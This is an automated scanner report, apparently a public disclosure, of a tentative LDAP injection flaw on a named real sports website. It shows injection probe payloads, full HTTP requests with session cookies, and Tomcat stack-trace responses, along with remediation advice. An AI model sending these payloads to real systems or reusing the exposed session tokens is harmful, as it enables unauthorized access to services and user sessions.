LDAP Injection, springframework, Proof of Concept

CWE-90: Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')

Report generated by CloudScan Vulnerability Crawler at Thu Jan 13 12:12:02 CST 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.


1. LDAP injection

Summary

Severity:   High
Confidence:   Tentative
Host:   http://msn.foxsports.com
Path:   /module/pollaction

Issue detail

The REST URL parameter 2 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /module/*)(sn=*;jsessionid=B0E37D9CEC4284C917EBD810E61F000A HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; 
pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
nnCoection: close
Date: Sat, 08 Jan 2011 01:32:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 11073

<html><head><title>Apache Tomcat/5.5.20 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
ramework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:204)
   $Proxy96.getContent(Unknown Source)
   com.foxsports.action.module.ModuleAction.execute(ModuleAction.java:107)
   sun.reflect.GeneratedMethodAccessor21304.invoke(Unknown Source)
   sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
   java.lang.reflect.Method.invoke(Method.java:597)
   com.opensymphony.xwork2.DefaultActionInvocation.invokeAction(DefaultActionInvocation.java:441)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:243)
   com.opensymphony.xwork2.interceptor.DefaultWorkflowInterceptor.doIntercept(DefaultWorkflowInterceptor.java:165)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   org.apache.struts2.interceptor.validation.AnnotationValidationInterceptor.doIntercept(AnnotationValidationInterceptor.java:68)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.ConversionErrorInterceptor.intercept(ConversionErrorInterceptor.java:122)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.ParametersInterceptor.doIntercept(ParametersInterceptor.java:195)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.ParametersInterceptor.doIntercept(ParametersInterceptor.java:195)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.StaticParametersInterceptor.intercept(StaticParametersInterceptor.java:179)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237
...[SNIP]...

Request 2

GET /module/*)!(sn=*;jsessionid=B0E37D9CEC4284C917EBD810E61F000A HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; 
pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response 2

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
nnCoection: close
Date: Sat, 08 Jan 2011 01:32:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 11147

<html><head><title>Apache Tomcat/5.5.20 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
ramework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:204)
   $Proxy96.getContent(Unknown Source)
   com.foxsports.action.module.ModuleAction.execute(ModuleAction.java:107)
   sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
   sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39)
   sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
   java.lang.reflect.Method.invoke(Method.java:597)
   com.opensymphony.xwork2.DefaultActionInvocation.invokeAction(DefaultActionInvocation.java:441)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:243)
   com.opensymphony.xwork2.interceptor.DefaultWorkflowInterceptor.doIntercept(DefaultWorkflowInterceptor.java:165)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   org.apache.struts2.interceptor.validation.AnnotationValidationInterceptor.doIntercept(AnnotationValidationInterceptor.java:68)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.ConversionErrorInterceptor.intercept(ConversionErrorInterceptor.java:122)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.ParametersInterceptor.doIntercept(ParametersInterceptor.java:195)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.ParametersInterceptor.doIntercept(ParametersInterceptor.java:195)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.StaticParametersInterceptor.intercept(StaticParametersInterceptor.java:179)
   com.opensymp
...[SNIP]...
